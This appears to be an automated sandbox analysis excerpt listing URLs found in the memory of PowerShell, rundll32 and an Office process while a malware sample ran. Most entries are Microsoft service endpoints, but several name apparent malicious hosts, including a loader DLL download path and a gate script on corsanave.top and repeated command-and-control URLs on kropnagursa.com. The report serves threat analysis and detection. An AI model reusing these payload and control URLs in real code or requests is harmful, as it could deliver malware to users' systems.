            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:20:06 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
            Source: rundll32.exe, 0000000A.00000003.438057390.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.436721664.0000017521B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://corpnagursa.com/
            Source: powershell.exe, 00000004.00000002.433111959.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.433111959.0000000004D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://corsanave.top
            Source: powershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://corsanave.top/dll/loader_D
            Source: powershell.exe, 00000004.00000002.433111959.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.433111959.0000000004D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://corsanave.top/dll/loader_p2_dll_64_n1_x64_inf.dll36.dll
            Source: powershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.433111959.0000000004941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://corsanave.top/gatef.php
            Source: powershell.exe, 00000004.00000002.433111959.0000000004D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://corsanave.top4
            Source: powershell.exe, 00000004.00000002.433111959.0000000004DBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://corsanave.topD8
            Source: powershell.exe, 00000004.00000002.431747574.0000000000A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
            Source: rundll32.exe, 0000000A.00000003.467593354.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.656217497.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.789350633.0000017521BCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.462563204.0000017521BB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.438057390.0000017521B9F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.594455037.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.463668652.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.820420785.0000017521BCF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.633585585.0000017523A80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.802468973.0000017521C0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.511276634.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.685181998.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.774229236.0000017521C10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.821359402.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.528347791.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.781507494.0000017521C17000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.465239910.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.451262478.0000017521B9F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.460951995.0000017521BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.721823197.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.808631164.0000017521BCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/
            Source: rundll32.exe, 0000000A.00000003.513959945.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.534519731.0000017521BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/&
            Source: rundll32.exe, 0000000A.00000003.463668652.0000017521B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/)m
            Source: rundll32.exe, 0000000A.00000003.789350633.0000017521BCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.795796582.0000017521BCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.781710578.0000017521BCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.798186172.0000017521BCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.753229002.0000017521BCC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.752757213.0000017521BCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/-
            Source: rundll32.exe, 0000000A.00000003.449648350.0000017521B9F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.470290806.0000017521B9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/0
            Source: rundll32.exe, 0000000A.00000003.466473675.0000017521B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/1m
            Source: rundll32.exe, 0000000A.00000003.475037143.0000017521B9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/2
            Source: rundll32.exe, 0000000A.00000003.685181998.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.686635829.0000017521BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/4
            Source: rundll32.exe, 0000000A.00000003.520814674.0000017521BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/8
            Source: rundll32.exe, 0000000A.00000003.754470600.0000017521BCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.753229002.0000017521BCC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.752757213.0000017521BCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/=
            Source: rundll32.exe, 0000000A.00000003.827279276.0000017521BCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.829831364.0000017521BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/E
            Source: rundll32.exe, 0000000A.00000003.814155591.0000017521BCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/H
            Source: rundll32.exe, 0000000A.00000003.431713420.0000017521B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/Ml
            Source: rundll32.exe, 0000000A.00000003.817730546.0000017521BCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/X
            Source: rundll32.exe, 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/b
            Source: rundll32.exe, 0000000A.00000003.520617159.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.511045925.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.493439373.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.456819458.0000017521B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/e
            Source: rundll32.exe, 0000000A.00000003.804410969.0000017521BCF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.805944189.0000017521BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/f
            Source: rundll32.exe, 0000000A.00000003.802843120.0000017521BCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.804410969.0000017521BCF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.805944189.0000017521BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com/h
            Source: rundll32.exe, 0000000A.00000003.475037143.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.493439373.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.436721664.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.462327553.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.511045925.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.468772863.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.835726070.0000017521B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com:80/
            Source: rundll32.exe, 0000000A.00000003.452775566.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.451262478.0000017521B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com:80/PG
            Source: rundll32.exe, 0000000A.00000003.528347791.0000017521B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.com:80/w
            Source: rundll32.exe, 0000000A.00000003.633585585.0000017523A80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.543079236.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.437938783.0000017521BC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.813998449.0000017521C14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.803961836.0000017521C14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.836132936.0000017521C14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.701224281.0000017523AAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.821869787.0000017521C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kropnagursa.comropnagursa.com/
            Source: rundll32.exe, 0000000A.00000003.449648350.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.453979630.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.452775566.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.451262478.0000017521B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://krosvchost.exe
            Source: powershell.exe, 00000004.00000002.449646578.00000000059A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: powershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngD
            Source: powershell.exe, 00000004.00000002.433111959.0000000004941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: powershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlD
            Source: rundll32.exe, rundll32.exe, 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmp, MZvYng.bin.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.aadrm.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.aadrm.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.cortana.ai
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.diagnostics.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.office.net
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.onedrive.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://api.scheduler.
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://augloop.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://augloop.office.com/v2
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://cdn.entity.
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://clients.config.office.net/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://config.edge.skype.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
            Source: powershell.exe, 00000004.00000002.449646578.00000000059A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.449646578.00000000059A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.449646578.00000000059A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://cortana.ai
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://cortana.ai/api
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://cr.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://d.docs.live.net
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://dev.cortana.ai
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://devnull.onenote.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://directory.services.
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://enrichment.osi.office.net/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: powershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterD
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: powershell.exe, 00000004.00000002.433111959.00000000051AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://graph.ppe.windows.net
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://graph.windows.net
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://graph.windows.net/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://invites.office.com/
